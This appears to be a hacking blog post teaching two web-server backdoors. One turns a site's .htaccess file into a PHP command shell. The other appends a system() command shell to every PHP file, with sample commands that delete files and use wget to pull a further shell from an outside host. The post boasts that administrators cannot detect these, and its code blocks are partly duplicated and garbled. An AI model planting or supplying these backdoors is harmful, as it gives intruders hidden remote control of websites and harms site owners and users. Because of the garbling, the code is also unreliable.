By "Kunal Vohra", Director@H2K
In This Tutorial I Will Teach You Guys Two Methods of simple backdoors Note:-90% ebadmins cant detect these backdoors, so enjoy..
Method 1:- Backdoor .htaccess file:
To backdoor .htaccess file of a website. Add the code below to the .htaccess file and change Permission to 777 (chmod 777).
Code:-
<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>
AddType application/x-httpd-
php .htaccess
# <?php passthru($_GET
['cmd']); ?>
Order allow,deny
Allow from all
</Files>
AddType application/x-httpd-
php .htaccess
# <?php passthru($_GET
['cmd']); ?>
Now goto:
Code:- site.com/.htaccess?cmd=ls
after = you can run a command of your choice :).
Method 2:- Backdoor all php files:
To Backdoor all php files using a small code.
Code:
<?php $cmd = <<<EOD
cmd
EOD;
if(isset($_REQUEST[$cmd])) {
system($_REQUEST[$cmd]); } ?>
cmd
EOD;
if(isset($_REQUEST[$cmd])) {
system($_REQUEST[$cmd]); } ?>
Append the above code into all PHP files of the website.
Now goto the:
backdooredsite.com/
phpfile.php?cmd=
phpfile.php?cmd=
After the equal sign add your command.
Sample Commands:-
Code:-
ls = Display the contents of the current directory ls -a = Display also hidden files and hidden directories rm name = Remove a file or directory called name wget http://site.com/shell.txt;mv shell.txt
shell.php = Upload php shell
Thats It Enjoy Simple and Effective Backdooring..
Still Having Problem..!!! Connect with Admin
For Daily Updates
No comments:
Post a Comment